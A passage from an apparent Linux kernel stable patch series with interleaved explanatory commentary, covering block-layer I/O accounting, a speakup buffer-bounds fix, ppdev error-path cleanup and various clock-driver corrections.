+-PURGATORY_CFLAGS := -mcmodel=large -ffreestanding -fno-zero-initialized-in-bss -g0
++PURGATORY_CFLAGS := -mcmodel=small -ffreestanding -fno-zero-initialized-in-bss -g0
++PURGATORY_CFLAGS += -fpic -fvisibility=hidden
+ PURGATORY_CFLAGS += $(DISABLE_STACKLEAK_PLUGIN) -DDISABLE_BRANCH_PROFILING
+ PURGATORY_CFLAGS += -fno-stack-protector
+ 
+diff --git a/arch/x86/tools/relocs.c b/arch/x86/tools/relocs.c
+index 9a5b101c45023..4fd824a448245 100644
+--- a/arch/x86/tools/relocs.c
++++ b/arch/x86/tools/relocs.c
+@@ -746,6 +746,15 @@ static void walk_relocs(int (*process)(struct section *sec, Elf_Rel *rel,
+ 		if (!(sec_applies->shdr.sh_flags & SHF_ALLOC)) {
+ 			continue;
+ 		}
++
++		/*
++		 * Do not perform relocations in .notes sections; any
++		 * values there are meant for pre-boot consumption (e.g.
++		 * startup_xen).
++		 */
++		if (sec_applies->shdr.sh_type == SHT_NOTE)
++			continue;
++
+ 		sh_symtab = sec_symtab->symtab;
+ 		sym_strtab = sec_symtab->link->strtab;
+ 		for (j = 0; j < sec->shdr.sh_size/sizeof(Elf_Rel); j++) {
+diff --git a/arch/x86/um/shared/sysdep/archsetjmp.h b/arch/x86/um/shared/sysdep/archsetjmp.h
+index 166cedbab9266..8c81d1a604a94 100644
+--- a/arch/x86/um/shared/sysdep/archsetjmp.h
++++ b/arch/x86/um/shared/sysdep/archsetjmp.h
+@@ -1,6 +1,13 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __X86_UM_SYSDEP_ARCHSETJMP_H
++#define __X86_UM_SYSDEP_ARCHSETJMP_H
++
+ #ifdef __i386__
+ #include "archsetjmp_32.h"
+ #else
+ #include "archsetjmp_64.h"
+ #endif
++
++unsigned long get_thread_reg(int reg, jmp_buf *buf);
++
++#endif /* __X86_UM_SYSDEP_ARCHSETJMP_H */
+diff --git a/block/blk-core.c b/block/blk-core.c
+index aefdf07bdc2cf..a4155f123ab38 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -933,10 +933,11 @@ void update_io_ticks(struct block_device *part, unsigned long now, bool end)
+ 	unsigned long stamp;
+ again:
+ 	stamp = READ_ONCE(part->bd_stamp);
+-	if (unlikely(time_after(now, stamp))) {
+-		if (likely(try_cmpxchg(&part->bd_stamp, &stamp, now)))
+-			__part_stat_add(part, io_ticks, end ? now - stamp : 1);
+-	}
++	if (unlikely(time_after(now, stamp)) &&
++	    likely(try_cmpxchg(&part->bd_stamp, &stamp, now)) &&
++	    (end || part_in_flight(part)))
++		__part_stat_add(part, io_ticks, now - stamp);
++
+ 	if (part->bd_partno) {
+ 		part = bdev_whole(part);
+ 		goto again;
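The update_io_ticks() change keeps the lockless stamp update but only credits the full now - stamp delta when the device is demonstrably busy (an I/O is completing, or part_in_flight() reports outstanding requests), rather than adding a single tick on every issue. A stand-alone analogue of the compare-and-swap pattern, assuming C11 atomics in place of the kernel's try_cmpxchg() and ignoring the jiffies wraparound that time_after() handles:

  #include <stdatomic.h>
  #include <stdbool.h>

  static _Atomic unsigned long stamp;

  /* Advance 'stamp' to 'now' at most once per tick; only the winner
   * of the compare-and-swap accounts the elapsed time, and only while
   * the device is busy. */
  static void account_tick(unsigned long now, bool busy,
                           unsigned long *io_ticks)
  {
          unsigned long old = atomic_load(&stamp);

          if (now > old &&
              atomic_compare_exchange_strong(&stamp, &old, now) &&
              busy)
                  *io_ticks += now - old;
  }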
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index cc7f6a4a255c9..13a47b37acb7d 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -779,6 +779,8 @@ static void blk_account_io_merge_request(struct request *req)
+ 	if (blk_do_io_stat(req)) {
+ 		part_stat_lock();
+ 		part_stat_inc(req->part, merges[op_stat_group(req_op(req))]);
++		part_stat_local_dec(req->part,
++				    in_flight[op_is_write(req_op(req))]);
+ 		part_stat_unlock();
+ 	}
+ }
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index e1b12f3d54bd4..3afa5c8d165b1 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -971,17 +971,6 @@ bool blk_update_request(struct request *req, blk_status_t error,
+ }
+ EXPORT_SYMBOL_GPL(blk_update_request);
+ 
+-static void __blk_account_io_done(struct request *req, u64 now)
+-{
+-	const int sgrp = op_stat_group(req_op(req));
+-
+-	part_stat_lock();
+-	update_io_ticks(req->part, jiffies, true);
+-	part_stat_inc(req->part, ios[sgrp]);
+-	part_stat_add(req->part, nsecs[sgrp], now - req->start_time_ns);
+-	part_stat_unlock();
+-}
+-
+ static inline void blk_account_io_done(struct request *req, u64 now)
+ {
+ 	/*
+@@ -990,32 +979,39 @@ static inline void blk_account_io_done(struct request *req, u64 now)
+ 	 * containing request is enough.
+ 	 */
+ 	if (blk_do_io_stat(req) && req->part &&
+-	    !(req->rq_flags & RQF_FLUSH_SEQ))
+-		__blk_account_io_done(req, now);
+-}
+-
+-static void __blk_account_io_start(struct request *rq)
+-{
+-	/*
+-	 * All non-passthrough requests are created from a bio with one
+-	 * exception: when a flush command that is part of a flush sequence
+-	 * generated by the state machine in blk-flush.c is cloned onto the
+-	 * lower device by dm-multipath we can get here without a bio.
+-	 */
+-	if (rq->bio)
+-		rq->part = rq->bio->bi_bdev;
+-	else
+-		rq->part = rq->q->disk->part0;
++	    !(req->rq_flags & RQF_FLUSH_SEQ)) {
++		const int sgrp = op_stat_group(req_op(req));
+ 
+-	part_stat_lock();
+-	update_io_ticks(rq->part, jiffies, false);
+-	part_stat_unlock();
++		part_stat_lock();
++		update_io_ticks(req->part, jiffies, true);
++		part_stat_inc(req->part, ios[sgrp]);
++		part_stat_add(req->part, nsecs[sgrp], now - req->start_time_ns);
++		part_stat_local_dec(req->part,
++				    in_flight[op_is_write(req_op(req))]);
++		part_stat_unlock();
++	}
+ }
+ 
+ static inline void blk_account_io_start(struct request *req)
+ {
+-	if (blk_do_io_stat(req))
+-		__blk_account_io_start(req);
++	if (blk_do_io_stat(req)) {
++		/*
++		 * All non-passthrough requests are created from a bio with one
++		 * exception: when a flush command that is part of a flush sequence
++		 * generated by the state machine in blk-flush.c is cloned onto the
++		 * lower device by dm-multipath we can get here without a bio.
++		 */
++		if (req->bio)
++			req->part = req->bio->bi_bdev;
++		else
++			req->part = req->q->disk->part0;
++
++		part_stat_lock();
++		update_io_ticks(req->part, jiffies, false);
++		part_stat_local_inc(req->part,
++				    in_flight[op_is_write(req_op(req))]);
++		part_stat_unlock();
++	}
+ }
+ 
+ static inline void __blk_mq_end_request_acct(struct request *rq, u64 now)
+diff --git a/block/blk.h b/block/blk.h
+index a186ea20f39d8..9b2f53ff4c37f 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -346,6 +346,7 @@ static inline bool blk_do_io_stat(struct request *rq)
+ }
+ 
+ void update_io_ticks(struct block_device *part, unsigned long now, bool end);
++unsigned int part_in_flight(struct block_device *part);
+ 
+ static inline void req_set_nomerge(struct request_queue *q, struct request *req)
+ {
+diff --git a/block/genhd.c b/block/genhd.c
+index ddb17c4adc8a2..f9e3ecd5ba2fa 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -123,7 +123,7 @@ static void part_stat_read_all(struct block_device *part,
+ 	}
+ }
+ 
+-static unsigned int part_in_flight(struct block_device *part)
++unsigned int part_in_flight(struct block_device *part)
+ {
+ 	unsigned int inflight = 0;
+ 	int cpu;
+diff --git a/crypto/asymmetric_keys/Kconfig b/crypto/asymmetric_keys/Kconfig
+index 3df3fe4ed95fa..a7c09785f5727 100644
+--- a/crypto/asymmetric_keys/Kconfig
++++ b/crypto/asymmetric_keys/Kconfig
+@@ -84,5 +84,7 @@ config FIPS_SIGNATURE_SELFTEST
+ 	depends on KEYS
+ 	depends on ASYMMETRIC_KEY_TYPE
+ 	depends on PKCS7_MESSAGE_PARSER
++	depends on CRYPTO_RSA
++	depends on CRYPTO_SHA256
+ 
+ endif # ASYMMETRIC_KEY_TYPE
+diff --git a/drivers/accessibility/speakup/main.c b/drivers/accessibility/speakup/main.c
+index 45d906f17ea3d..10aa9c2ec400e 100644
+--- a/drivers/accessibility/speakup/main.c
++++ b/drivers/accessibility/speakup/main.c
+@@ -573,7 +573,7 @@ static u_long get_word(struct vc_data *vc)
+ 	}
+ 	attr_ch = get_char(vc, (u_short *)tmp_pos, &spk_attr);
+ 	buf[cnt++] = attr_ch;
+-	while (tmpx < vc->vc_cols - 1 && cnt < sizeof(buf) - 1) {
++	while (tmpx < vc->vc_cols - 1 && cnt < ARRAY_SIZE(buf) - 1) {
+ 		tmp_pos += 2;
+ 		tmpx++;
+ 		ch = get_char(vc, (u_short *)tmp_pos, &temp);
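The speakup fix is a units bug: the buffer being filled holds 16-bit characters, so sizeof(buf) counts bytes (twice the element count) and let cnt index past the end of the array, while ARRAY_SIZE() counts elements. A tiny demonstration of the difference:

  #include <stdio.h>

  #define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))

  int main(void)
  {
          unsigned short buf[100];

          /* prints "200 bytes, 100 elements" where short is 16 bits */
          printf("%zu bytes, %zu elements\n",
                 sizeof(buf), ARRAY_SIZE(buf));
          return 0;
  }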
+diff --git a/drivers/acpi/acpi_lpss.c b/drivers/acpi/acpi_lpss.c
+index 8b44743945c8b..52af775ac1f16 100644
+--- a/drivers/acpi/acpi_lpss.c
++++ b/drivers/acpi/acpi_lpss.c
+@@ -319,6 +319,7 @@ static const struct lpss_device_desc bsw_i2c_dev_desc = {
+ 
+ static const struct property_entry bsw_spi_properties[] = {
+ 	PROPERTY_ENTRY_U32("intel,spi-pxa2xx-type", LPSS_BSW_SSP),
++	PROPERTY_ENTRY_U32("num-cs", 2),
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/acpica/Makefile b/drivers/acpi/acpica/Makefile
+index f919811156b1f..b6cf9c9bd6396 100644
+--- a/drivers/acpi/acpica/Makefile
++++ b/drivers/acpi/acpica/Makefile
+@@ -5,6 +5,7 @@
+ 
+ ccflags-y			:= -D_LINUX -DBUILDING_ACPICA
+ ccflags-$(CONFIG_ACPI_DEBUG)	+= -DACPI_DEBUG_OUTPUT
++CFLAGS_tbfind.o 		+= $(call cc-disable-warning, stringop-truncation)
+ 
+ # use acpi.o to put all files here into acpi.o modparam namespace
+ obj-y	+= acpi.o
+diff --git a/drivers/acpi/numa/srat.c b/drivers/acpi/numa/srat.c
+index b57de78fbf14f..a44c0761fd1c0 100644
+--- a/drivers/acpi/numa/srat.c
++++ b/drivers/acpi/numa/srat.c
+@@ -206,6 +206,11 @@ int __init srat_disabled(void)
+ 	return acpi_numa < 0;
+ }
+ 
++__weak int __init numa_fill_memblks(u64 start, u64 end)
++{
++	return NUMA_NO_MEMBLK;
++}
++
+ #if defined(CONFIG_X86) || defined(CONFIG_ARM64) || defined(CONFIG_LOONGARCH)
+ /*
+  * Callback for SLIT parsing.  pxm_to_node() returns NUMA_NO_NODE for
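The numa.c hunk earlier moves the #endif so numa_fill_memblks() no longer lives inside the conditional block it shared with memory_add_physaddr_to_nid(), and this srat.c hunk adds a __weak fallback: the stub is used unless some object file provides a strong definition of the same symbol, which is what lets generic ACPI code call numa_fill_memblks() on every architecture. The convention in a two-file sketch, with made-up names:

  /* lib/defaults.c: weak default, picked when nothing overrides it */
  int __attribute__((weak)) plat_fill_memblks(unsigned long start,
                                              unsigned long end)
  {
          return -1;      /* "no memblock" */
  }

  /* arch/foo/numa.c: a strong definition replaces the weak one at
   * link time; callers are none the wiser */
  int plat_fill_memblks(unsigned long start, unsigned long end)
  {
          /* architecture-specific handling ... */
          return 0;
  }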
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 959952e8ede38..220cedda2ca7d 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -2298,10 +2298,13 @@ static void __exit null_exit(void)
+ 
+ 	if (g_queue_mode == NULL_Q_MQ && shared_tags)
+ 		blk_mq_free_tag_set(&tag_set);
++
++	mutex_destroy(&lock);
+ }
+ 
+ module_init(null_init);
+ module_exit(null_exit);
+ 
+ MODULE_AUTHOR("Jens Axboe <axboe@kernel.dk>");
++MODULE_DESCRIPTION("multi queue aware block test driver");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index a0fadde993d70..2dda94a0875a6 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -148,8 +148,10 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ 	}
+ 
+ 	build_label = kstrndup(&edl->data[1], build_lbl_len, GFP_KERNEL);
+-	if (!build_label)
++	if (!build_label) {
++		err = -ENOMEM;
+ 		goto out;
++	}
+ 
+ 	hci_set_fw_info(hdev, "%s", build_label);
+ 
+diff --git a/drivers/char/ppdev.c b/drivers/char/ppdev.c
+index 38b46c7d17371..a97edbf7455a6 100644
+--- a/drivers/char/ppdev.c
++++ b/drivers/char/ppdev.c
+@@ -296,28 +296,35 @@ static int register_device(int minor, struct pp_struct *pp)
+ 	if (!port) {
+ 		pr_warn("%s: no associated port!\n", name);
+ 		rc = -ENXIO;
+-		goto err;
++		goto err_free_name;
++	}
++
++	index = ida_alloc(&ida_index, GFP_KERNEL);
++	if (index < 0) {
++		pr_warn("%s: failed to get index!\n", name);
++		rc = index;
++		goto err_put_port;
+ 	}
+ 
+-	index = ida_simple_get(&ida_index, 0, 0, GFP_KERNEL);
+ 	memset(&ppdev_cb, 0, sizeof(ppdev_cb));
+ 	ppdev_cb.irq_func = pp_irq;
+ 	ppdev_cb.flags = (pp->flags & PP_EXCL) ? PARPORT_FLAG_EXCL : 0;
+ 	ppdev_cb.private = pp;
+ 	pdev = parport_register_dev_model(port, name, &ppdev_cb, index);
+-	parport_put_port(port);
+ 
+ 	if (!pdev) {
+ 		pr_warn("%s: failed to register device!\n", name);
+ 		rc = -ENXIO;
+-		ida_simple_remove(&ida_index, index);
+-		goto err;
++		ida_free(&ida_index, index);
++		goto err_put_port;
+ 	}
+ 
+ 	pp->pdev = pdev;
+ 	pp->index = index;
+ 	dev_dbg(&pdev->dev, "registered pardevice\n");
+-err:
++err_put_port:
++	parport_put_port(port);
++err_free_name:
+ 	kfree(name);
+ 	return rc;
+ }
+@@ -750,7 +757,7 @@ static int pp_release(struct inode *inode, struct file *file)
+ 
+ 	if (pp->pdev) {
+ 		parport_unregister_device(pp->pdev);
+-		ida_simple_remove(&ida_index, pp->index);
++		ida_free(&ida_index, pp->index);
+ 		pp->pdev = NULL;
+ 		pr_debug(CHRDEV "%x: unregistered pardevice\n", minor);
+ 	}
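Three things change in ppdev at once: the deprecated ida_simple_get()/ida_simple_remove() pair becomes ida_alloc()/ida_free(), the allocation result is finally checked, and the error labels are reordered so parport_put_port() runs on every failure path instead of only some. The modern IDA API in isolation, as a sketch:

  #include <linux/idr.h>

  static DEFINE_IDA(example_ida);

  static int example_get_id(void)
  {
          /* returns the lowest free id >= 0, or a negative errno */
          return ida_alloc(&example_ida, GFP_KERNEL);
  }

  static void example_put_id(int id)
  {
          ida_free(&example_ida, id);
  }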
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index 35b2519f16961..bba0e7c667dc1 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -24,10 +24,12 @@
+ #define RS9_REG_SS_AMP_0V7			0x1
+ #define RS9_REG_SS_AMP_0V8			0x2
+ #define RS9_REG_SS_AMP_0V9			0x3
++#define RS9_REG_SS_AMP_DEFAULT			RS9_REG_SS_AMP_0V8
+ #define RS9_REG_SS_AMP_MASK			0x3
+ #define RS9_REG_SS_SSC_100			0
+ #define RS9_REG_SS_SSC_M025			(1 << 3)
+ #define RS9_REG_SS_SSC_M050			(3 << 3)
++#define RS9_REG_SS_SSC_DEFAULT			RS9_REG_SS_SSC_100
+ #define RS9_REG_SS_SSC_MASK			(3 << 3)
+ #define RS9_REG_SS_SSC_LOCK			BIT(5)
+ #define RS9_REG_SR				0x2
+@@ -196,8 +198,8 @@ static int rs9_get_common_config(struct rs9_driver_data *rs9)
+ 	int ret;
+ 
+ 	/* Set defaults */
+-	rs9->pll_amplitude = RS9_REG_SS_AMP_0V7;
+-	rs9->pll_ssc = RS9_REG_SS_SSC_100;
++	rs9->pll_amplitude = RS9_REG_SS_AMP_DEFAULT;
++	rs9->pll_ssc = RS9_REG_SS_SSC_DEFAULT;
+ 
+ 	/* Output clock amplitude */
+ 	ret = of_property_read_u32(np, "renesas,out-amplitude-microvolt",
+@@ -238,13 +240,13 @@ static void rs9_update_config(struct rs9_driver_data *rs9)
+ 	int i;
+ 
+ 	/* If amplitude is non-default, update it. */
+-	if (rs9->pll_amplitude != RS9_REG_SS_AMP_0V7) {
++	if (rs9->pll_amplitude != RS9_REG_SS_AMP_DEFAULT) {
+ 		regmap_update_bits(rs9->regmap, RS9_REG_SS, RS9_REG_SS_AMP_MASK,
+ 				   rs9->pll_amplitude);
+ 	}
+ 
+ 	/* If SSC is non-default, update it. */
+-	if (rs9->pll_ssc != RS9_REG_SS_SSC_100) {
++	if (rs9->pll_ssc != RS9_REG_SS_SSC_DEFAULT) {
+ 		regmap_update_bits(rs9->regmap, RS9_REG_SS, RS9_REG_SS_SSC_MASK,
+ 				   rs9->pll_ssc);
+ 	}
+diff --git a/drivers/clk/mediatek/clk-mt8365-mm.c b/drivers/clk/mediatek/clk-mt8365-mm.c
+index 22c75a03a6452..bc0b1162ed431 100644
+--- a/drivers/clk/mediatek/clk-mt8365-mm.c
++++ b/drivers/clk/mediatek/clk-mt8365-mm.c
+@@ -53,7 +53,7 @@ static const struct mtk_gate mm_clks[] = {
+ 	GATE_MM0(CLK_MM_MM_DSI0, "mm_dsi0", "mm_sel", 17),
+ 	GATE_MM0(CLK_MM_MM_DISP_RDMA1, "mm_disp_rdma1", "mm_sel", 18),
+ 	GATE_MM0(CLK_MM_MM_MDP_RDMA1, "mm_mdp_rdma1", "mm_sel", 19),
+-	GATE_MM0(CLK_MM_DPI0_DPI0, "mm_dpi0_dpi0", "vpll_dpix", 20),
++	GATE_MM0(CLK_MM_DPI0_DPI0, "mm_dpi0_dpi0", "dpi0_sel", 20),
+ 	GATE_MM0(CLK_MM_MM_FAKE, "mm_fake", "mm_sel", 21),
+ 	GATE_MM0(CLK_MM_MM_SMI_COMMON, "mm_smi_common", "mm_sel", 22),
+ 	GATE_MM0(CLK_MM_MM_SMI_LARB0, "mm_smi_larb0", "mm_sel", 23),
+diff --git a/drivers/clk/qcom/dispcc-sm6350.c b/drivers/clk/qcom/dispcc-sm6350.c
+index ea6f54ed846ec..441f042f5ea45 100644
+--- a/drivers/clk/qcom/dispcc-sm6350.c
++++ b/drivers/clk/qcom/dispcc-sm6350.c
+@@ -221,26 +221,17 @@ static struct clk_rcg2 disp_cc_mdss_dp_crypto_clk_src = {
+ 	},
+ };
+ 
+-static const struct freq_tbl ftbl_disp_cc_mdss_dp_link_clk_src[] = {
+-	F(162000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(270000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(540000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(810000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	{ }
+-};
+-
+ static struct clk_rcg2 disp_cc_mdss_dp_link_clk_src = {
+ 	.cmd_rcgr = 0x10f8,
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_0,
+-	.freq_tbl = ftbl_disp_cc_mdss_dp_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data){
+ 		.name = "disp_cc_mdss_dp_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_0,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_0),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/dispcc-sm8450.c b/drivers/clk/qcom/dispcc-sm8450.c
+index 64626f620a01b..e7dd45a2058c1 100644
+--- a/drivers/clk/qcom/dispcc-sm8450.c
++++ b/drivers/clk/qcom/dispcc-sm8450.c
+@@ -309,26 +309,17 @@ static struct clk_rcg2 disp_cc_mdss_dptx0_aux_clk_src = {
+ 	},
+ };
+ 
+-static const struct freq_tbl ftbl_disp_cc_mdss_dptx0_link_clk_src[] = {
+-	F(162000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(270000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(540000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(810000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	{ }
+-};
+-
+ static struct clk_rcg2 disp_cc_mdss_dptx0_link_clk_src = {
+ 	.cmd_rcgr = 0x819c,
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx0_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+@@ -382,13 +373,12 @@ static struct clk_rcg2 disp_cc_mdss_dptx1_link_clk_src = {
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx1_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+@@ -442,13 +432,12 @@ static struct clk_rcg2 disp_cc_mdss_dptx2_link_clk_src = {
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx2_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+@@ -502,13 +491,12 @@ static struct clk_rcg2 disp_cc_mdss_dptx3_link_clk_src = {
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx3_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/mmcc-msm8998.c b/drivers/clk/qcom/mmcc-msm8998.c
+index e5a72c2f080f8..c282424bac537 100644
+--- a/drivers/clk/qcom/mmcc-msm8998.c
++++ b/drivers/clk/qcom/mmcc-msm8998.c
+@@ -2578,6 +2578,8 @@ static struct clk_hw *mmcc_msm8998_hws[] = {
+ 
+ static struct gdsc video_top_gdsc = {
+ 	.gdscr = 0x1024,
++	.cxcs = (unsigned int []){ 0x1028, 0x1034, 0x1038 },
++	.cxc_count = 3,
+ 	.pd = {
+ 		.name = "video_top",
+ 	},
+@@ -2586,20 +2588,26 @@ static struct gdsc video_top_gdsc = {
+ 
+ static struct gdsc video_subcore0_gdsc = {
+ 	.gdscr = 0x1040,
++	.cxcs = (unsigned int []){ 0x1048 },
++	.cxc_count = 1,
+ 	.pd = {
+ 		.name = "video_subcore0",
+ 	},
+ 	.parent = &video_top_gdsc.pd,
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = HW_CTRL,
+ };
+ 
+ static struct gdsc video_subcore1_gdsc = {
+ 	.gdscr = 0x1044,
++	.cxcs = (unsigned int []){ 0x104c },
++	.cxc_count = 1,
+ 	.pd = {
+ 		.name = "video_subcore1",
+ 	},
+ 	.parent = &video_top_gdsc.pd,
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = HW_CTRL,
+ };
+ 
+ static struct gdsc mdss_gdsc = {
+diff --git a/drivers/clk/renesas/r8a779a0-cpg-mssr.c b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+index e02542ca24a06..5c908c8c5180d 100644
+--- a/drivers/clk/renesas/r8a779a0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+@@ -139,7 +139,7 @@ static const struct mssr_mod_clk r8a779a0_mod_clks[] __initconst = {
+ 	DEF_MOD("avb3",		214,	R8A779A0_CLK_S3D2),
+ 	DEF_MOD("avb4",		215,	R8A779A0_CLK_S3D2),
+ 	DEF_MOD("avb5",		216,	R8A779A0_CLK_S3D2),
+-	DEF_MOD("canfd0",	328,	R8A779A0_CLK_CANFD),
++	DEF_MOD("canfd0",	328,	R8A779A0_CLK_S3D2),
+ 	DEF_MOD("csi40",	331,	R8A779A0_CLK_CSI0),
+ 	DEF_MOD("csi41",	400,	R8A779A0_CLK_CSI0),
+ 	DEF_MOD("csi42",	401,	R8A779A0_CLK_CSI0),
+diff --git a/drivers/clk/renesas/r9a07g043-cpg.c b/drivers/clk/renesas/r9a07g043-cpg.c
+index 37475465100de..0b56688ecbfc4 100644
+--- a/drivers/clk/renesas/r9a07g043-cpg.c
++++ b/drivers/clk/renesas/r9a07g043-cpg.c
+@@ -252,6 +252,10 @@ static struct rzg2l_mod_clk r9a07g043_mod_clks[] = {
+ 				0x5a8, 1),
+ 	DEF_MOD("tsu_pclk",	R9A07G043_TSU_PCLK, R9A07G043_CLK_TSU,
+ 				0x5ac, 0),
++#ifdef CONFIG_RISCV
++	DEF_MOD("nceplic_aclk",	R9A07G043_NCEPLIC_ACLK, R9A07G043_CLK_P1,
++				0x608, 0),
++#endif
+ };
+ 
+ static struct rzg2l_reset r9a07g043_resets[] = {
+@@ -305,6 +309,10 @@ static struct rzg2l_reset r9a07g043_resets[] = {
+ 	DEF_RST(R9A07G043_ADC_PRESETN, 0x8a8, 0),
+ 	DEF_RST(R9A07G043_ADC_ADRST_N, 0x8a8, 1),
+ 	DEF_RST(R9A07G043_TSU_PRESETN, 0x8ac, 0),
++#ifdef CONFIG_RISCV
++	DEF_RST(R9A07G043_NCEPLIC_ARESETN, 0x908, 0),
++#endif
++
+ };
+ 
+ static const unsigned int r9a07g043_crit_mod_clks[] __initconst = {
+@@ -314,6 +322,7 @@ static const unsigned int r9a07g043_crit_mod_clks[] __initconst = {
+ #endif
+ #ifdef CONFIG_RISCV
+ 	MOD_CLK_BASE + R9A07G043_IAX45_CLK,
++	MOD_CLK_BASE + R9A07G043_NCEPLIC_ACLK,
+ #endif
+ 	MOD_CLK_BASE + R9A07G043_DMAC_ACLK,
+ };
+diff --git a/drivers/clk/samsung/clk-exynosautov9.c b/drivers/clk/samsung/clk-exynosautov9.c
+index 7b16320bba667..c360639562755 100644
+--- a/drivers/clk/samsung/clk-exynosautov9.c
++++ b/drivers/clk/samsung/clk-exynosautov9.c
+@@ -343,13 +343,13 @@ static const struct samsung_pll_clock top_pll_clks[] __initconst = {
+ 	/* CMU_TOP_PURECLKCOMP */
+ 	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared0_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED0, PLL_CON3_PLL_SHARED0, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared1_pll", "oscclk",
++	PLL(pll_0822x, FOUT_SHARED1_PLL, "fout_shared1_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED1, PLL_CON3_PLL_SHARED1, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared2_pll", "oscclk",
++	PLL(pll_0822x, FOUT_SHARED2_PLL, "fout_shared2_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED2, PLL_CON3_PLL_SHARED2, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared3_pll", "oscclk",
++	PLL(pll_0822x, FOUT_SHARED3_PLL, "fout_shared3_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED3, PLL_CON3_PLL_SHARED3, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared4_pll", "oscclk",
++	PLL(pll_0822x, FOUT_SHARED4_PLL, "fout_shared4_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED4, PLL_CON3_PLL_SHARED4, NULL),
+ };
+ 
+diff --git a/drivers/cpufreq/cppc_cpufreq.c b/drivers/cpufreq/cppc_cpufreq.c
+index 022e3555407c8..8791a88c7741c 100644
